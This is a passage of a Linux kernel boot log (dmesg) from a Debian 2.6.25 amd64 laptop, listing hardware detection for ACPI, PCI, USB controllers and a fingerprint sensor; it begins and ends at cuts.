MMC Host Controller (rev 12) 06:01.3 System peripheral: Ricoh Co Ltd R5C592 Memory Stick Bus Host Adapter (rev ff) Output of dmesg right after boot: [ 0.000000] Initializing cgroup subsys cpuset [ 0.000000] Linux version 2.6.25-1-amd64 (Debian 2.6.25-1) (waldi@debian.org) (gcc version 4.1.3 20080308 (prerelease) (Debian 4.1.2-21)) #1 SMP Fri Apr 25 14:38:55 UTC 2008 [ 0.000000] Command line: root=/dev/sda1 ro splash vga=791 usbcore.autosuspend=1 vga=775 splash [ 0.000000] BIOS-provided physical RAM map: [ 0.000000] BIOS-e820: 0000000000000000 - 000000000009fc00 (usable) [ 0.000000] BIOS-e820: 000000000009fc00 - 00000000000a0000 (reserved) [ 0.000000] BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved) [ 0.000000] BIOS-e820: 0000000000100000 - 000000007f7a0000 (usable) [ 0.000000] BIOS-e820: 000000007f7a0000 - 000000007f7ae000 (ACPI data) [ 0.000000] BIOS-e820: 000000007f7ae000 - 000000007f7f0000 (ACPI NVS) [ 0.000000] BIOS-e820: 000000007f7f0000 - 000000007f800000 (reserved) [ 0.000000] BIOS-e820: 00000000fee00000 - 00000000fee01000 (reserved) [ 0.000000] BIOS-e820: 00000000fff00000 - 0000000100000000 (reserved) [ 0.000000] Entering add_active_range(0, 0, 159) 0 entries of 3200 used [ 0.000000] Entering add_active_range(0, 256, 522144) 1 entries of 3200 used [ 0.000000] end_pfn_map = 1048576 [ 0.000000] DMI present. [ 0.000000] ACPI: RSDP 000FB0D0, 0014 (r0 ACPIAM) [ 0.000000] ACPI: RSDT 7F7A0000, 003C (r1 A_M_I_ OEMRSDT 11000719 MSFT 97) [ 0.000000] ACPI: FACP 7F7A0200, 0084 (r2 A_M_I_ OEMFACP 11000719 MSFT 97) [ 0.000000] ACPI: DSDT 7F7A05B0, 6FD8 (r1 A0813 A0813000 0 INTL 20060113) [ 0.000000] ACPI: FACS 7F7AE000, 0040 [ 0.000000] ACPI: APIC 7F7A0390, 005C (r1 A_M_I_ OEMAPIC 11000719 MSFT 97) [ 0.000000] ACPI: MCFG 7F7A03F0, 003C (r1 A_M_I_ OEMMCFG 11000719 MSFT 97) [ 0.000000] ACPI: OEMB 7F7AE040, 0061 (r1 A_M_I_ AMI_OEM 11000719 MSFT 97) [ 0.000000] ACPI: HPET 7F7A7590, 0038 (r1 A_M_I_ OEMHPET 11000719 MSFT 97) [ 0.000000] ACPI: GSCI 7F7AE0B0, 2024 (r1 A_M_I_ GMCHSCI 11000719 MSFT 97) [ 0.000000] No NUMA configuration found [ 0.000000] Faking a node at 0000000000000000-000000007f7a0000 [ 0.000000] Entering add_active_range(0, 0, 159) 0 entries of 3200 used [ 0.000000] Entering add_active_range(0, 256, 522144) 1 entries of 3200 used [ 0.000000] Bootmem setup node 0 0000000000000000-000000007f7a0000 [ 0.000000] NODE_DATA [000000000000c000 - 0000000000012fff] [ 0.000000] bootmap [0000000000013000 - 0000000000022ef7] pages 10 [ 0.000000] early res: 0 [0-fff] BIOS data page [ 0.000000] early res: 1 [6000-7fff] SMP_TRAMPOLINE [ 0.000000] early res: 2 [200000-63d2f7] TEXT DATA BSS [ 0.000000] early res: 3 [37a3d000-37fefa49] RAMDISK [ 0.000000] early res: 4 [9fc00-a0bff] EBDA [ 0.000000] early res: 5 [8000-bfff] PGTABLE [ 0.000000] [ffffe20000000000-ffffe200001fffff] PMD -&gt;ffff810001200000 on node 0 [ 0.000000] [ffffe20000200000-ffffe200003fffff] PMD -&gt;ffff810001600000 on node 0 [ 0.000000] [ffffe20000400000-ffffe200005fffff] PMD -&gt;ffff810001a00000 on node 0 [ 0.000000] [ffffe20000600000-ffffe200007fffff] PMD -&gt;ffff810001e00000 on node 0 [ 0.000000] [ffffe20000800000-ffffe200009fffff] PMD -&gt;ffff810002200000 on node 0 [ 0.000000] [ffffe20000a00000-ffffe20000bfffff] PMD -&gt;ffff810002600000 on node 0 [ 0.000000] [ffffe20000c00000-ffffe20000dfffff] PMD -&gt;ffff810002a00000 on node 0 [ 0.000000] [ffffe20000e00000-ffffe20000ffffff] PMD -&gt;ffff810002e00000 on node 0 [ 0.000000] [ffffe20001000000-ffffe200011fffff] PMD -&gt;ffff810003200000 on node 0 [ 0.000000] [ffffe20001200000-ffffe200013fffff] PMD -&gt;ffff810003600000 on node 0 [ 0.000000] [ffffe20001400000-ffffe200015fffff] PMD -&gt;ffff810003a00000 on node 0 [ 0.000000] [ffffe20001600000-ffffe200017fffff] PMD -&gt;ffff810003e00000 on node 0 [ 0.000000] [ffffe20001800000-ffffe200019fffff] PMD -&gt;ffff810004200000 on node 0 [ 0.000000] [ffffe20001a00000-ffffe20001bfffff] PMD -&gt;ffff810004600000 on node 0 [ 0.000000] Zone PFN ranges: [ 0.000000] DMA 0 -&gt; 4096 [ 0.000000] DMA32 4096 -&gt; 1048576 [ 0.000000] Normal 1048576 -&gt; 1048576 [ 0.000000] Movable zone start PFN for each node [ 0.000000] early_node_map[2] active PFN ranges [ 0.000000] 0: 0 -&gt; 159 [ 0.000000] 0: 256 -&gt; 522144 [ 0.000000] On node 0 totalpages: 522047 [ 0.000000] DMA zone: 56 pages used for memmap [ 0.000000] DMA zone: 1095 pages reserved [ 0.000000] DMA zone: 2848 pages, LIFO batch:0 [ 0.000000] DMA32 zone: 7082 pages used for memmap [ 0.000000] DMA32 zone: 510966 pages, LIFO batch:31 [ 0.000000] Normal zone: 0 pages used for memmap [ 0.000000] Movable zone: 0 pages used for memmap [ 0.000000] ACPI: PM-Timer IO Port: 0x808 [ 0.000000] ACPI: Local APIC address 0xfee00000 [ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x00] enabled) [ 0.000000] Processor #0 (Bootup-CPU) [ 0.000000] ACPI: LAPIC (acpi_id[0x02] lapic_id[0x01] enabled) [ 0.000000] Processor #1 [ 0.000000] ACPI: IOAPIC (id[0x02] address[0xfec00000] gsi_base[0]) [ 0.000000] IOAPIC[0]: apic_id 2, address 0xfec00000, GSI 0-23 [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level) [ 0.000000] ACPI: IRQ0 used by override. [ 0.000000] ACPI: IRQ2 used by override. [ 0.000000] ACPI: IRQ9 used by override. [ 0.000000] Setting APIC routing to flat [ 0.000000] ACPI: HPET id: 0xffffffff base: 0xfed00000 [ 0.000000] Using ACPI (MADT) for SMP configuration information [ 0.000000] PM: Registered nosave memory: 000000000009f000 - 00000000000a0000 [ 0.000000] PM: Registered nosave memory: 00000000000a0000 - 00000000000e0000 [ 0.000000] PM: Registered nosave memory: 00000000000e0000 - 0000000000100000 [ 0.000000] Allocating PCI resources starting at 80000000 (gap: 7f800000:7f600000) [ 0.000000] SMP: Allowing 2 CPUs, 0 hotplug CPUs [ 0.000000] PERCPU: Allocating 35096 bytes of per cpu data [ 0.000000] Built 1 zonelists in Node order, mobility grouping on. Total pages: 513814 [ 0.000000] Policy zone: DMA32 [ 0.000000] Kernel command line: root=/dev/sda1 ro splash vga=791 usbcore.autosuspend=1 vga=775 splash [ 0.000000] Initializing CPU#0 [ 0.000000] PID hash table entries: 4096 (order: 12, 32768 bytes) [ 0.000000] TSC calibrated against PM_TIMER [ 0.000001] time.c: Detected 2194.500 MHz processor. [ 0.000022] Console: colour dummy device 80x25 [ 0.000024] console [tty0] enabled [ 0.000153] Checking aperture... [ 0.000162] Calgary: detecting Calgary via BIOS EBDA area [ 0.000164] Calgary: Unable to locate Rio Grande table in EBDA - bailing! [ 0.004000] Memory: 2049028k/2088576k available (2183k kernel code, 39160k reserved, 1013k data, 372k init) [ 0.004000] CPA: page pool initialized 1 of 1 pages preallocated [ 0.004000] hpet clockevent registered [ 0.080007] Calibrating delay using timer specific routine.. 4392.46 BogoMIPS (lpj=8784930) [ 0.080053] Security Framework initialized [ 0.080060] SELinux: Disabled at boot. [ 0.080064] Capability LSM initialized [ 0.080270] Dentry cache hash table entries: 262144 (order: 9, 2097152 bytes) [ 0.081440] Inode-cache hash table entries: 131072 (order: 8, 1048576 bytes) [ 0.082039] Mount-cache hash table entries: 256 [ 0.082190] Initializing cgroup subsys ns [ 0.082196] Initializing cgroup subsys cpuacct [ 0.082216] CPU: L1 I cache: 32K, L1 D cache: 32K [ 0.082220] CPU: L2 cache: 4096K [ 0.082224] CPU 0/0 -&gt; Node 0 [ 0.082227] CPU: Physical Processor ID: 0 [ 0.082229] CPU: Processor Core ID: 0 [ 0.082237] CPU0: Thermal monitoring enabled (TM2) [ 0.082240] using mwait in idle threads. [ 0.083071] ACPI: Core revision 20070126 [ 0.136896] Using local APIC timer interrupts. [ 0.140009] APIC timer calibration result 12468767 [ 0.140011] Detected 12.468 MHz APIC timer. [ 0.140164] Booting processor 1/2 APIC 0x1 [ 0.004000] Initializing CPU#1 [ 0.004000] Calibrating delay using timer specific routine.. 4389.05 BogoMIPS (lpj=8778118) [ 0.004000] CPU: L1 I cache: 32K, L1 D cache: 32K [ 0.004000] CPU: L2 cache: 4096K [ 0.004000] CPU 1/1 -&gt; Node 0 [ 0.004000] CPU: Physical Processor ID: 0 [ 0.004000] CPU: Processor Core ID: 1 [ 0.004000] CPU1: Thermal monitoring enabled (TM2) [ 0.004000] Intel(R) Core(TM)2 Duo CPU T7500 @ 2.20GHz stepping 0a [ 0.228581] checking TSC synchronization [CPU#0 -&gt; CPU#1]: passed. [ 0.232045] Brought up 2 CPUs [ 0.232129] CPU0 attaching sched-domain: [ 0.232132] domain 0: span 00000003 [ 0.232133] groups: 00000001 00000002 [ 0.232136] domain 1: span 00000003 [ 0.232138] groups: 00000003 [ 0.232140] CPU1 attaching sched-domain: [ 0.232141] domain 0: span 00000003 [ 0.232143] groups: 00000002 00000001 [ 0.232145] domain 1: span 00000003 [ 0.232146] groups: 00000003 [ 0.232396] net_namespace: 1016 bytes [ 0.232402] Booting paravirtualized kernel on bare hardware [ 0.232582] NET: Registered protocol family 16 [ 0.232758] ACPI: bus type pci registered [ 0.232836] PCI: BIOS Bug: MCFG area at e0000000 is not E820-reserved [ 0.232840] PCI: Not using MMCONFIG. [ 0.232843] PCI: Using configuration type 1 [ 0.236651] ACPI: EC: Look up EC in DSDT [ 0.344365] ACPI: Interpreter enabled [ 0.344369] ACPI: (supports S0 S1 S3 S4 S5) [ 0.344389] ACPI: Using IOAPIC for interrupt routing [ 0.117888] ACPI: EC: non-query interrupt received, switching to interrupt mode [ 0.126463] ACPI: EC: GPE = 0x1c, I/O: command/status = 0x66, data = 0x62 [ 0.126467] ACPI: EC: driver started in interrupt mode [ 0.126569] ACPI: PCI Root Bridge [PCI0] (0000:00) [ 0.127295] pci 0000:00:1f.0: quirk: region 0800-087f claimed by ICH6 ACPI/GPIO/TCO [ 0.127301] pci 0000:00:1f.0: quirk: region 0500-053f claimed by ICH6 GPIO [ 0.128207] PCI: Transparent bridge - 0000:00:1e.0 [ 0.128242] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] [ 0.128425] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P1._PRT] [ 0.128531] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P4._PRT] [ 0.128632] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P6._PRT] [ 0.128730] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P7._PRT] [ 0.128828] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P8._PRT] [ 0.183232] ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 5 6 7 10 *11 12 14 15) [ 0.183363] ACPI: PCI Interrupt Link [LNKB] (IRQs 3 4 5 6 *7 10 11 12 14 15) [ 0.183492] ACPI: PCI Interrupt Link [LNKC] (IRQs 3 4 5 6 7 10 11 12 14 *15) [ 0.183620] ACPI: PCI Interrupt Link [LNKD] (IRQs 3 4 5 6 7 *10 11 12 14 15) [ 0.183749] ACPI: PCI Interrupt Link [LNKE] (IRQs 3 4 5 6 7 10 11 12 14 15) *0, disabled. [ 0.183878] ACPI: PCI Interrupt Link [LNKF] (IRQs *3 4 5 6 7 10 11 12 14 15) [ 0.184006] ACPI: PCI Interrupt Link [LNKG] (IRQs 3 4 5 6 7 10 11 12 14 15) *0, disabled. [ 0.184148] ACPI: PCI Interrupt Link [LNKH] (IRQs 3 4 *5 6 7 10 11 12 14 15) [ 0.184972] Linux Plug and Play Support v0.97 (c) Adam Belay [ 0.185000] pnp: PnP ACPI init [ 0.185008] ACPI: bus type pnp registered [ 0.185174] pnp 00:00: Plug and Play ACPI device, IDs PNP0a08 PNP0a03 (active) [ 0.185187] 00:01: calling quirk 0xffffffff8035b6d2: quirk_system_pci_resources+0x0/0x173() [ 0.185231] pnp 00:01: Plug and Play ACPI device, IDs PNP0c01 (active) [ 0.185282] pnp 00:02: Plug and Play ACPI device, IDs PNP0200 (active) [ 0.185331] pnp 00:03: Plug and Play ACPI device, IDs PNP0b00 (active) [ 0.185424] pnp 00:04: Plug and Play ACPI device, IDs PNP0303 PNP030b (active) [ 0.185516] pnp 00:05: Plug and Play ACPI device, IDs SYN0a06 SYN0a00 SYN0a04 SYN0002 PNP0f13 (active) [ 0.185561] pnp 00:06: Plug and Play ACPI device, IDs PNP0800 (active) [ 0.185608] pnp 00:07: Plug and Play ACPI device, IDs PNP0c04 (active) [ 0.185765] 00:08: calling quirk 0xffffffff8035b6d2: quirk_system_pci_resources+0x0/0x173() [ 0.185812] pnp 00:08: Plug and Play ACPI device, IDs PNP0c02 (active) [ 0.185989] pnp 00:09: Plug and Play ACPI device, IDs PNP0103 (active) [ 0.186085] 00:0a: calling quirk 0xffffffff8035b6d2: quirk_system_pci_resources+0x0/0x173() [ 0.186132] pnp 00:0a: Plug and Play ACPI device, IDs PNP0c02 (active) [ 0.186240] 00:0b: calling quirk 0xffffffff8035b6d2: quirk_system_pci_resources+0x0/0x173() [ 0.186286] pnp 00:0b: Plug and Play ACPI device, IDs PNP0c02 (active) [ 0.416894] 00:0c: calling quirk 0xffffffff8035b6d2: quirk_system_pci_resources+0x0/0x173() [ 0.416948] pnp 00:0c: Plug and Play ACPI device, IDs PNP0c01 (active) [ 0.417286] pnp: PnP ACPI: found 13 devices [ 0.417289] ACPI: ACPI bus type pnp unregistered [ 0.417457] usbcore: registered new interface driver usbfs [ 0.417509] usbcore: registered new interface driver hub [ 0.417547] usbcore: registered new device driver usb [ 0.417670] PCI: Using ACPI for IRQ routing [ 0.417674] PCI: If a device doesn't work, try "pci=routeirq". If it helps, post a report [ 0.436059] PCI-GART: No AMD northbridge found. [ 0.436065] hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0 [ 0.436070] hpet0: 3 64-bit timers, 14318180 Hz [ 0.437101] ACPI: RTC can wake from S4 [ 0.452043] pnp: the driver 'system' has been registered [ 0.452051] system 00:01: iomem range 0xfed14000-0xfed19fff has been reserved [ 0.452055] system 00:01: driver attached [ 0.452062] system 00:08: ioport range 0x25c-0x25f has been reserved [ 0.452066] system 00:08: ioport range 0x4d0-0x4d1 has been reserved [ 0.452070] system 00:08: ioport range 0x800-0x87f has been reserved [ 0.452074] system 00:08: ioport range 0x500-0x53f has been reserved [ 0.452080] system 00:08: iomem range 0xfed1c000-0xfed1ffff has been reserved [ 0.452084] system 00:08: iomem range 0xfed20000-0xfed3ffff has been reserved [ 0.452088] system 00:08: iomem range 0xfed50000-0xfed8ffff has been reserved [ 0.452092] system 00:08: iomem range 0xffb00000-0xffbfffff has been reserved [ 0.452096] system 00:08: iomem range 0xfff00000-0xffffffff could not be reserved [ 0.452101] system 00:08: driver attached [ 0.452106] system 00:0a: iomem range 0xfec00000-0xfec00fff has been reserved [ 0.452111] system 00:0a: iomem range 0xfee00000-0xfee00fff could not be reserved [ 0.452115] system 00:0a: driver attached [ 0.452119] system 00:0b: iomem range 0xe0000000-0xefffffff has been reserved [ 0.452123] system 00:0b: driver attached [ 0.452127] system 00:0c: iomem range 0x0-0x9ffff could not be reserved [ 0.452131] system 00:0c: iomem range 0xc0000-0xcffff has been reserved [ 0.452136] system 00:0c: iomem range 0xe0000-0xfffff could not be reserved [ 0.452140] system 00:0c: iomem range 0x100000-0x7f7fffff could not be reserved [ 0.452145] system 00:0c: iomem range 0xfed90000-0xffffffff could not be reserved [ 0.452149] system 00:0c: driver attached [ 0.452491] PCI: Bridge: 0000:00:1c.0 [ 0.452495] IO window: e000-efff [ 0.452501] MEM window: 0xf8000000-0xfbefffff [ 0.452506] PREFETCH window: 0x00000000f0000000-0x00000000f6ffffff [ 0.452513] PCI: Bridge: 0000:00:1c.2 [ 0.452515] IO window: disabled. [ 0.452520] MEM window: 0xf7f00000-0xf7ffffff [ 0.452525] PREFETCH window: disabled. [ 0.452531] PCI: Bridge: 0000:00:1c.3 [ 0.452534] IO window: d000-dfff [ 0.452540] MEM window: 0xf7e00000-0xf7efffff [ 0.452544] PREFETCH window: disabled. [ 0.452550] PCI: Bridge: 0000:00:1c.4 [ 0.452554] IO window: c000-cfff [ 0.452559] MEM window: 0xf7d00000-0xf7dfffff [ 0.452563] PREFETCH window: disabled. [ 0.452570] PCI: Bridge: 0000:00:1e.0 [ 0.452572] IO window: disabled. [ 0.452577] MEM window: 0xfbf00000-0xfbffffff [ 0.452581] PREFETCH window: disabled. [ 0.452605] ACPI: PCI Interrupt 0000:00:1c.0[A] -&gt; GSI 16 (level, low) -&gt; IRQ 16 [ 0.452612] PCI: Setting latency timer of device 0000:00:1c.0 to 64 [ 0.452628] ACPI: PCI Interrupt 0000:00:1c.2[C] -&gt; GSI 18 (level, low) -&gt; IRQ 18 [ 0.452635] PCI: Setting latency timer of device 0000:00:1c.2 to 64 [ 0.452651] ACPI: PCI Interrupt 0000:00:1c.3[D] -&gt; GSI 19 (level, low) -&gt; IRQ 19 [ 0.452657] PCI: Setting latency timer of device 0000:00:1c.3 to 64 [ 0.452672] ACPI: PCI Interrupt 0000:00:1c.4[A] -&gt; GSI 16 (level, low) -&gt; IRQ 16 [ 0.452679] PCI: Setting latency timer of device 0000:00:1c.4 to 64 [ 0.452688] PCI: Setting latency timer of device 0000:00:1e.0 to 64 [ 0.452712] NET: Registered protocol family 2 [ 0.488134] IP route cache hash table entries: 65536 (order: 7, 524288 bytes) [ 0.488779] TCP established hash table entries: 262144 (order: 10, 4194304 bytes) [ 0.490293] TCP bind hash table entries: 65536 (order: 8, 1048576 bytes) [ 0.490825] TCP: Hash tables configured (established 262144 bind 65536) [ 0.490829] TCP reno registered [ 0.500223] checking if image is initramfs...&lt;7&gt;Switched to high resolution mode on CPU 1 [ 0.504045] Switched to high resolution mode on CPU 0 [ 0.717971] it is [ 0.950510] Freeing initrd memory: 5834k freed [ 0.728656] audit: initializing netlink socket (disabled) [ 0.728679] type=2000 audit(1210420467.952:1): initialized [ 0.728899] Total HugeTLB memory allocated, 0 [ 0.728984] VFS: Disk quotas dquot_6.5.1 [ 0.729009] Dquot-cache hash table entries: 512 (order 0, 4096 bytes) [ 0.729096] io scheduler noop registered [ 0.729099] io scheduler anticipatory registered [ 0.729102] io scheduler deadline registered [ 0.729114] io scheduler cfq registered (default) [ 0.729126] pci 0000:00:02.0: Boot video device [ 0.800218] PCI: Setting latency timer of device 0000:00:1c.0 to 64 [ 0.800246] assign_interrupt_mode Found MSI capability [ 0.800282] Allocate Port Service[0000:00:1c.0:pcie00] [ 0.800319] Allocate Port Service[0000:00:1c.0:pcie02] [ 0.800392] PCI: Setting latency timer of device 0000:00:1c.2 to 64 [ 0.800421] assign_interrupt_mode Found MSI capability [ 0.800452] Allocate Port Service[0000:00:1c.2:pcie00] [ 0.800482] Allocate Port Service[0000:00:1c.2:pcie02] [ 0.800555] PCI: Setting latency timer of device 0000:00:1c.3 to 64 [ 0.800583] assign_interrupt_mode Found MSI capability [ 0.800614] Allocate Port Service[0000:00:1c.3:pcie00] [ 0.800642] Allocate Port Service[0000:00:1c.3:pcie02] [ 0.800715] PCI: Setting latency timer of device 0000:00:1c.4 to 64 [ 0.800743] assign_interrupt_mode Found MSI capability [ 0.800774] Allocate Port Service[0000:00:1c.4:pcie00] [ 0.800805] Allocate Port Service[0000:00:1c.4:pcie02] [ 0.801175] vesafb: framebuffer at 0xd0000000, mapped to 0xffffc20000900000, using 3072k, total 7616k [ 0.801181] vesafb: mode is 1024x768x16, linelength=2048, pages=3 [ 0.801184] vesafb: scrolling: redraw [ 0.801188] vesafb: Truecolor: size=0:5:6:5, shift=0:11:5:0 [ 0.816555] Console: switching to colour frame buffer device 128x48 [ 0.829392] fb0: VESA VGA frame buffer device [ 0.831471] Real Time Clock Driver v1.12ac [ 0.831725] hpet_resources: 0xfed00000 is busy [ 0.831780] Linux agpgart interface v0.103 [ 0.831884] Serial: 8250/16550 driver $Revision: 1.90 $ 4 ports, IRQ sharing enabled [ 0.832302] pnp: the driver 'serial' has been registered [ 0.833069] brd: module loaded [ 0.833204] input: Macintosh mouse button emulation as /class/input/input0 [ 0.833458] pnp: the driver 'i8042 kbd' has been registered [ 0.833467] i8042 kbd 00:04: driver attached [ 0.833494] pnp: the driver 'i8042 aux' has been registered [ 0.833505] i8042 aux 00:05: driver attached [ 0.833534] PNP: PS/2 Controller [PNP0303:PS2K,PNP0f13:PS2M] at 0x60,0x64 irq 1,12 [ 0.835695] i8042.c: Detected active multiplexing controller, rev 1.1. [ 0.836618] serio: i8042 KBD port at 0x60,0x64 irq 1 [ 0.836739] serio: i8042 AUX0 port at 0x60,0x64 irq 12 [ 0.836868] serio: i8042 AUX1 port at 0x60,0x64 irq 12 [ 0.836996] serio: i8042 AUX2 port at 0x60,0x64 irq 12 [ 0.837125] serio: i8042 AUX3 port at 0x60,0x64 irq 12 [ 0.860142] mice: PS/2 mouse device common for all mice [ 0.860305] cpuidle: using governor ladder [ 0.860408] cpuidle: using governor menu [ 0.860822] TCP cubic registered [ 0.860911] NET: Registered protocol family 1 [ 0.861021] NET: Registered protocol family 17 [ 0.861231] registered taskstats version 1 [ 0.861445] Freeing unused kernel memory: 372k freed [ 0.894448] input: AT Translated Set 2 keyboard as /class/input/input1 [ 1.121436] ACPI: SSDT 7F7B00E0, 0320 (r1 AMI CPU1PM 1 INTL 20060113) [ 1.124620] ACPI: CPU0 (power states: C1[C1] C2[C2] C3[C3]) [ 1.127606] ACPI: ACPI0007:00 is registered as cooling_device0 [ 1.128085] ACPI: Processor [CPU1] (supports 8 throttling states) [ 1.132344] ACPI: SSDT 7F7B0400, 00E3 (r1 AMI CPU2PM 1 INTL 20060113) [ 0.957132] ACPI: CPU1 (power states: C1[C1] C2[C2] C3[C3]) [ 1.138540] Marking TSC unstable due to TSC halts in idle [ 0.960138] ACPI: ACPI0007:01 is registered as cooling_device1 [ 0.964077] ACPI: Processor [CPU2] (supports 8 throttling states) [ 1.031396] ACPI: LNXTHERM:01 is registered as thermal_zone0 [ 1.082471] ACPI: Thermal Zone [TZ00] (34 C) [ 1.299138] Clocksource tsc unstable (delta = -95044026 ns) [ 1.473853] USB Universal Host Controller Interface driver v3.0 [ 1.475181] ACPI: PCI Interrupt 0000:00:1a.0[A] -&gt; GSI 16 (level, low) -&gt; IRQ 16 [ 1.479155] PCI: Setting latency timer of device 0000:00:1a.0 to 64 [ 1.479158] uhci_hcd 0000:00:1a.0: UHCI Host Controller [ 1.487199] uhci_hcd 0000:00:1a.0: new USB bus registered, assigned bus number 1 [ 1.491176] uhci_hcd 0000:00:1a.0: irq 16, io base 0x0000b800 [ 1.495254] usb usb1: configuration #1 chosen from 1 choice [ 1.499174] hub 1-0:1.0: USB hub found [ 1.503154] hub 1-0:1.0: 2 ports detected [ 1.333670] No dock devices found. [ 1.532468] SCSI subsystem initialized [ 1.579765] libata version 3.00 loaded. [ 1.615241] usb usb1: New USB device found, idVendor=1d6b, idProduct=0001 [ 1.619178] usb usb1: New USB device strings: Mfr=3, Product=2, SerialNumber=1 [ 1.623165] usb usb1: Product: UHCI Host Controller [ 1.627157] usb usb1: Manufacturer: Linux 2.6.25-1-amd64 uhci_hcd [ 1.631157] usb usb1: SerialNumber: 0000:00:1a.0 [ 1.635190] ACPI: PCI Interrupt 0000:00:1a.1[B] -&gt; GSI 17 (level, low) -&gt; IRQ 17 [ 1.639165] PCI: Setting latency timer of device 0000:00:1a.1 to 64 [ 1.639168] uhci_hcd 0000:00:1a.1: UHCI Host Controller [ 1.643206] uhci_hcd 0000:00:1a.1: new USB bus registered, assigned bus number 2 [ 1.647193] uhci_hcd 0000:00:1a.1: irq 17, io base 0x0000b880 [ 1.651249] usb usb2: configuration #1 chosen from 1 choice [ 1.655182] hub 2-0:1.0: USB hub found [ 1.659164] hub 2-0:1.0: 2 ports detected [ 1.767042] usb usb2: New USB device found, idVendor=1d6b, idProduct=0001 [ 1.770948] usb usb2: New USB device strings: Mfr=3, Product=2, SerialNumber=1 [ 1.774947] usb usb2: Product: UHCI Host Controller [ 1.774949] usb usb2: Manufacturer: Linux 2.6.25-1-amd64 uhci_hcd [ 1.778947] usb usb2: SerialNumber: 0000:00:1a.1 [ 1.778976] ACPI: PCI Interrupt 0000:00:1d.0[A] -&gt; GSI 23 (level, low) -&gt; IRQ 23 [ 1.778983] PCI: Setting latency timer of device 0000:00:1d.0 to 64 [ 1.778985] uhci_hcd 0000:00:1d.0: UHCI Host Controller [ 1.779024] uhci_hcd 0000:00:1d.0: new USB bus registered, assigned bus number 3 [ 1.779049] uhci_hcd 0000:00:1d.0: irq 23, io base 0x0000b080 [ 1.779145] usb usb3: configuration #1 chosen from 1 choice [ 1.779163] hub 3-0:1.0: USB hub found [ 1.779168] hub 3-0:1.0: 2 ports detected [ 1.682114] usb 1-1: new full speed USB device using uhci_hcd and address 2 [ 1.885990] usb usb3: New USB device found, idVendor=1d6b, idProduct=0001 [ 1.885992] usb usb3: New USB device strings: Mfr=3, Product=2, SerialNumber=1 [ 1.885994] usb usb3: Product: UHCI Host Controller [ 1.885995] usb usb3: Manufacturer: Linux 2.6.25-1-amd64 uhci_hcd [ 1.885997] usb usb3: SerialNumber: 0000:00:1d.0 [ 1.886017] ACPI: PCI Interrupt 0000:00:1d.1[B] -&gt; GSI 19 (level, low) -&gt; IRQ 19 [ 1.886023] PCI: Setting latency timer of device 0000:00:1d.1 to 64 [ 1.886026] uhci_hcd 0000:00:1d.1: UHCI Host Controller [ 1.886066] uhci_hcd 0000:00:1d.1: new USB bus registered, assigned bus number 4 [ 1.886090] uhci_hcd 0000:00:1d.1: irq 19, io base 0x0000b400 [ 1.886173] usb usb4: configuration #1 chosen from 1 choice [ 1.886191] hub 4-0:1.0: USB hub found [ 1.886196] hub 4-0:1.0: 2 ports detected [ 1.993098] usb usb4: New USB device found, idVendor=1d6b, idProduct=0001 [ 1.997017] usb usb4: New USB device strings: Mfr=3, Product=2, SerialNumber=1 [ 2.001018] usb usb4: Product: UHCI Host Controller [ 2.005016] usb usb4: Manufacturer: Linux 2.6.25-1-amd64 uhci_hcd [ 2.009019] usb usb4: SerialNumber: 0000:00:1d.1 [ 2.013033] ACPI: PCI Interrupt 0000:00:1d.2[C] -&gt; GSI 18 (level, low) -&gt; IRQ 18 [ 2.017020] PCI: Setting latency timer of device 0000:00:1d.2 to 64 [ 2.017023] uhci_hcd 0000:00:1d.2: UHCI Host Controller [ 2.021058] uhci_hcd 0000:00:1d.2: new USB bus registered, assigned bus number 5 [ 2.025040] uhci_hcd 0000:00:1d.2: irq 18, io base 0x0000b480 [ 2.029103] usb usb5: configuration #1 chosen from 1 choice [ 2.033035] hub 5-0:1.0: USB hub found [ 2.037024] hub 5-0:1.0: 2 ports detected [ 2.144754] usb usb5: New USB device found, idVendor=1d6b, idProduct=0001 [ 2.148675] usb usb5: New USB device strings: Mfr=3, Product=2, SerialNumber=1 [ 2.152671] usb usb5: Product: UHCI Host Controller [ 2.156673] usb usb5: Manufacturer: Linux 2.6.25-1-amd64 uhci_hcd [ 1.913460] usb 1-1: configuration #1 chosen from 1 choice [ 2.160704] usb usb5: SerialNumber: 0000:00:1d.2 [ 1.921773] usb 1-1: New USB device found, idVendor=147e, idProduct=2016 [ 1.921775] usb 1-1: New USB device strings: Mfr=1, Product=2, SerialNumber=0 [ 1.921777] usb 1-1: Product: Fingerprint Sensor [ 1.921778] usb 1-1: Manufacturer: TouchStrip [ 1.947128] ACPI: PCI Interrupt 0000:00:1a.7[C] -&gt; GSI 18 (level, low) -&gt; IRQ 18 [ 1.951095] PCI: Setting latency timer of device 0000:00:1a.7 to 64 [ 1.951098] ehci_hcd 0000:00:1a.7: EHCI Host Controller [ 1.955126] ehci_hcd 0000:00:1a.7: new USB bus registered, assigned bus number 6 [ 1.964095] ehci_hcd 0000:00:1a.7: debug port 1 [ 1.967088] PCI: cache line size of 32 is not supported by device 0000:00:1a.7 [ 1.967093] ehci_hcd 0000:00:1a.7: irq 18, io mem 0xf7afbc00 [ 1.991096] ehci_hcd 0000:00:1a.7: USB 2.0 started, EHCI 1.00, driver 10 Dec 2004 [ 1.995173] usb usb6: configuration #1 chosen from 1 choice [ 1.999113] hub 6-0:1.0: USB hub found [ 2.003092] hub 6-0:1.0: 4 ports detected [ 2.111090] usb usb6: New USB device found, idVendor=1d6b, idProduct=0002 [ 2.114983] usb usb6: New USB device strings: Mfr=3, Product=2, SerialNumber=1 [ 2.118980] usb usb6: Product: EHCI Host Controller [ 2.122980] usb usb6: Manufacturer: Linux 2.6.25-1-amd64 ehci_hcd [ 2.126979] usb usb6: SerialNumber: 0000:00:1a.7 [ 2.131014] ACPI: PCI Interrupt 0000:00:1d.7[A] -&gt; GSI 23 (level, low) -&gt; IRQ 23 [ 2.134990] PCI: Setting latency timer 